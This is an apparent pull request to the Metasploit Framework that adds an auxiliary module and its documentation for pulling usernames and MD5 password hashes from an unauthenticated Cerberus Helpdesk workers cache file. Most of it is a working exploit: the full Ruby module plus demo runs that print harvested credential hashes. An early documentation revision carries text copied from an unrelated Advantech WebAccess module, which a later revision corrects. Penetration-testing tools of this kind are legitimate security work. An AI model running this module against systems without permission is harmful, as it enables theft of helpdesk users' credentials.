### PR TITLE
Cerberus Helpdesk hash disclosure

### DIFF
--- a/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
+++ b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
@@ -1,0 +1,69 @@
+## Description
+
+This module exploits three vulnerabilities in Advantech WebAccess.
+
+The first vulnerability is the ability for an arbitrary user to access the admin user list page,
+revealing the username of every user on the system.
+
+The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with
+the data of an arbitrary user.
+
+The final vulnerability exploited is that the HTML Form on the user edit page contains the user's
+plain text password in the masked password input box. Typically the system should replace the
+actual password with a masked character such as "*".
+
+
+## Vulnerable Application
+
+Version 8.1 was tested during development:
+
+http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
+
+8.2 is not vulnerable to this.
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gahter/advantech_webaccess_creds```
+3. ```set WEBACCESSUSER [USER]```
+4. ```set WEBACCESSPASS [PASS]```
+5. ```run```
+
+## Options
+
+**WEBACCESSUSER**
+
+The username to use to log into Advantech WebAccess. By default, there is a built-in account
+```admin``` that you could use.
+
+**WEBACCESSPASS**
+
+The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
+does not have a password, which could be something you can use.
+
+
+## Demo
+
+msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options
+
+Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target address range or CIDR identifier
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS  1                yes       The number of concurrent threads
+   URI      /                no        URL of the Cerberus Helpdesk root
+   VHOST                     no        HTTP server virtual host
+
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 10.90.5.81
+rhosts => 10.90.5.81
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
+
+[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
+[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
+[+] example:112302c209fe8d73f502c132a3da2b1c
+[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7

--- a/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
+++ b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
@@ -5,12 +5,12 @@ data structure with username and password hash (MD5) credentials.  The contents 
 
 ## Vulnerable Application
 
-This module has been verified against:
+This module has been verified against the following Cerberus Helpdesk versions:
 
 1. Version 4.2.3 Stable (Build 925)
 2. Version 5.4.4
 
-However it may also work up to, but no including, version 6.7
+However it may also work up to, but not including, version 6.7
 
 Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
 

--- a/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
+++ b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
@@ -20,10 +20,10 @@ Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/8
 
 1. Start msfconsole
 2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
-3. ```set rhosts```
+3. ```set rhosts [rhosts]```
 4. ```run```
 
-## Demo
+## Scenarios
 
 ### 4.2.3 using zend (not verbose)
 
@@ -33,29 +33,50 @@ Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/8
     rhosts => 1.1.1.1
     msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
     
-    [-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
-    [+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
-    [+] example:112302c209fe8d73f502c132a3da2b1c
-    [+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7
+    [-] Invalid response received for 1.1.1.1    for /storage/tmp/devblocks_cache---ch_workers
+    [+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
+    [+] Found: example:112302c209fe8d73f502c132a3da2b1c
+    [+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
+    
+    Cerberus Helpdesk User Credentials
+    ==================================
+    
+     Username                     Password Hash
+     --------                     -------------
+     admin                        aaa34a6111abf0bd1b1c4d7cd7ebb37b
+     example                      112302c209fe8d73f502c132a3da2b1c
+     foobar                       0d108d09e5bbe40aade3de5c81e9e9c7
+    
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
   ```
 
 ### 5.4.4 using devblocks
 
   ```
     msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure 
-    rhost => 192.168.2.45
     msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
     rhosts => 192.168.2.45
-    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set uri /cerb5/
-    uri => /cerb5/
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
+    targeturi => /cerb5/
     msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
     verbose => true
     msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
     
     [*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
-    [+] bar@none.com:37b51d194a7513e45b56f6524f2d51f2
-    [+] foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
-    [+] admin@example.com:18126e7bd3f84b3f3e4df094def5b7de
+    [+] Found: bar@none.com:37b51d194a7513e45b56f6524f2d51f2
+    [+] Found: foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
+    [+] Found: mike@shorebreaksecurity.com:18126e7bd3f84b3f3e4df094def5b7de
+    
+    Cerberus Helpdesk User Credentials
+    ==================================
+    
+     Username                     Password Hash
+     --------                     -------------
+     bar@none.com                 37b51d194a7513e45b56f6524f2d51f2
+     foo@none.com                 acbd18db4cc2f85cedef654fccc4a4d8
+     admin@example.com            18126e7bd3f84b3f3e4df094def5b7de
+    
     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
   ```

--- a/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
+++ b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
@@ -1,69 +1,61 @@
 ## Description
 
-This module exploits three vulnerabilities in Advantech WebAccess.
-
-The first vulnerability is the ability for an arbitrary user to access the admin user list page,
-revealing the username of every user on the system.
-
-The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with
-the data of an arbitrary user.
-
-The final vulnerability exploited is that the HTML Form on the user edit page contains the user's
-plain text password in the masked password input box. Typically the system should replace the
-actual password with a masked character such as "*".
-
+This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a
+data structure with username and password hash (MD5) credentials.  The contents looks similar to JSON, however it is not.
 
 ## Vulnerable Application
 
-Version 8.1 was tested during development:
+This module has been verified against:
 
-http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
+1. Version 4.2.3 Stable (Build 925)
+2. Version 5.4.4
 
-8.2 is not vulnerable to this.
+However it may also work up to, but no including, version 6.7
+
+Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
+
+* of note, 5.4.4 has to be installed on a PRE php7 environment.
 
 ## Verification Steps
 
 1. Start msfconsole
-2. ```use auxiliary/gahter/advantech_webaccess_creds```
-3. ```set WEBACCESSUSER [USER]```
-4. ```set WEBACCESSPASS [PASS]```
-5. ```run```
-
-## Options
-
-**WEBACCESSUSER**
-
-The username to use to log into Advantech WebAccess. By default, there is a built-in account
-```admin``` that you could use.
-
-**WEBACCESSPASS**
-
-The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
-does not have a password, which could be something you can use.
-
+2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
+3. ```set rhosts```
+4. ```run```
 
 ## Demo
 
-msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
-msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options
+### 4.2.3 using zend (not verbose)
 
-Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure):
+  ```
+    msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
+    rhosts => 1.1.1.1
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
+    
+    [-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
+    [+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
+    [+] example:112302c209fe8d73f502c132a3da2b1c
+    [+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7
+  ```
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                    yes       The target address range or CIDR identifier
-   RPORT    80               yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   THREADS  1                yes       The number of concurrent threads
-   URI      /                no        URL of the Cerberus Helpdesk root
-   VHOST                     no        HTTP server virtual host
+### 5.4.4 using devblocks
 
-msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 10.90.5.81
-rhosts => 10.90.5.81
-msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
-
-[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
-[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
-[+] example:112302c209fe8d73f502c132a3da2b1c
-[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7
+  ```
+    msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure 
+    rhost => 192.168.2.45
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
+    rhosts => 192.168.2.45
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set uri /cerb5/
+    uri => /cerb5/
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
+    verbose => true
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
+    
+    [*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
+    [+] bar@none.com:37b51d194a7513e45b56f6524f2d51f2
+    [+] foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
+    [+] admin@example.com:18126e7bd3f84b3f3e4df094def5b7de
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

--- a/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
+++ b/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
@@ -15,15 +15,15 @@ class MetasploitModule < Msf::Auxiliary
       'Description'  => %q{
         This module extracts usernames and password hashes from the Cerberus Helpdesk
         through an unauthenticated accss to a workers file.
-        Verified on Version 4.2.3 Stable (Build 925)
+        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
         },
       'References'   =>
         [
           [ 'EDB', '39526' ]
         ],
       'Author'       => [
-        'asdizzle_', #discovery
-        'h00die',    #module
+        'asdizzle_', # discovery
+        'h00die',    # module
         ],
       'License'      => MSF_LICENSE
     )

--- a/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
+++ b/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
@@ -14,58 +14,69 @@ class MetasploitModule < Msf::Auxiliary
       'Name'         => 'Cerberus Helpdesk User Hash Disclosure',
       'Description'  => %q{
         This module extracts usernames and password hashes from the Cerberus Helpdesk
-        through an unauthenticated accss to a workers file.
+        through an unauthenticated access to a workers file.
         Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
         },
       'References'   =>
         [
           [ 'EDB', '39526' ]
         ],
-      'Author'       => [
-        'asdizzle_', # discovery
-        'h00die',    # module
+      'Author'       =>
+        [
+          'asdizzle_', # discovery
+          'h00die',    # module
         ],
-      'License'      => MSF_LICENSE
+      'License'      => MSF_LICENSE,
+      'DisclosureDate' => 'Mar 7 2016'
     )
 
     register_options(
       [
-        OptString.new('URI', [false, 'URL of the Cerberus Helpdesk root', '/'])
+        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
       ])
   end
 
   def run_host(rhost)
     begin
       ['devblocks', 'zend'].each do |site|
-        url = "#{datastore['URI']}storage/tmp/#{site}_cache---ch_workers"
+        url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
         vprint_status("Attempting to load data from #{url}")
         res = send_request_cgi({'uri' => url})
-        if not res
+        if !res
           print_error("#{peer} Unable to connect to #{url}")
-        else
-          if res.body.include?('pass')
-            # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
-            # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
-            result = res.body.split('s:5')
-            result.each do |cred|
-              if cred.include?('email')
-                cred = cred.split(':')
-                username = cred[3].tr('";', '') # remove extra characters
-                username = username[0...-1] # also remove trailing s
-                password_hash = cred[7].tr('";', '') # remove extra characters
-                print_good("#{username}:#{password_hash}")
-                store_valid_credential(
-                  user:         username,
-                  private:      password_hash,
-                  private_type: :nonreplayable_hash
-                )
-              end
-            end
-            break # no need to get the 2nd url
-          else
-            print_error("Invalid response received for #{url}")
+          next
+        end
+
+        if !res.body.include?('pass')
+          print_error("Invalid response received for #{peer} for #{url}")
+          next
+        end
+
+        cred_table = Rex::Text::Table.new 'Header'  => 'Cerberus Helpdesk User Credentials',
+                                          'Indent'  => 1,
+                                          'Columns' => ['Username', 'Password Hash']
+
+        # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
+        # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
+        result = res.body.split('s:5')
+        result.each do |cred|
+          if cred.include?('email')
+            cred = cred.split(':')
+            username = cred[3].tr('";', '') # remove extra characters
+            username = username[0...-1] # also remove trailing s
+            password_hash = cred[7].tr('";', '') # remove extra characters
+            print_good("Found: #{username}:#{password_hash}")
+            store_valid_credential(
+              user:         username,
+              private:      password_hash,
+              private_type: :nonreplayable_hash
+            )
+            cred_table << [username, password_hash]
           end
         end
+        print_line
+        print_line cred_table.to_s
+        break
       end
 
     rescue ::Rex::ConnectionError

--- a/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
+++ b/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'         => 'Cerberus Helpdesk User Hash Disclosure',
+      'Description'  => %q{
+        This module extracts usernames and password hashes from the Cerberus Helpdesk
+        through an unauthenticated accss to a workers file.
+        Verified on Version 4.2.3 Stable (Build 925)
+        },
+      'References'   =>
+        [
+          [ 'EDB', '39526' ]
+        ],
+      'Author'       => [
+        'asdizzle_', #discovery
+        'h00die',    #module
+        ],
+      'License'      => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        OptString.new('URI', [false, 'URL of the Cerberus Helpdesk root', '/'])
+      ])
+  end
+
+  def run_host(rhost)
+    begin
+      ['devblocks', 'zend'].each do |site|
+        url = "#{datastore['URI']}storage/tmp/#{site}_cache---ch_workers"
+        vprint_status("Attempting to load data from #{url}")
+        res = send_request_cgi({'uri' => url})
+        if not res
+          print_error("#{peer} Unable to connect to #{url}")
+        else
+          if res.body.include?('pass')
+            # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
+            # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
+            result = res.body.split('s:5')
+            result.each do |cred|
+              if cred.include?('email')
+                cred = cred.split(':')
+                username = cred[3].tr('";', '') # remove extra characters
+                username = username[0...-1] # also remove trailing s
+                password_hash = cred[7].tr('";', '') # remove extra characters
+                print_good("#{username}:#{password_hash}")
+                store_valid_credential(
+                  user:         username,
+                  private:      password_hash,
+                  private_type: :nonreplayable_hash
+                )
+              end
+            end
+            break # no need to get the 2nd url
+          else
+            print_error("Invalid response received for #{url}")
+          end
+        end
+      end
+
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} Unable to connect to site")
+      return
+    end
+  end
+end


### PR DESCRIPTION
metasploit implementation of a bash script on exploit db: https://www.exploit-db.com/exploits/39526/
edb verified the original exploit, i verified this module implementation against 2 different versions.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/gather/cerberus_helpdesk_hash_disclosure`
- [x] `set rhosts`
- [x] `set uri`
- [x] **Verify** u get mad hashes
- [x] **Document** make sure i spelled the goods

Installing this software was a somewhat pain, it has to be pre php7, so ubuntu 16.04 was a no go unless you load other repos.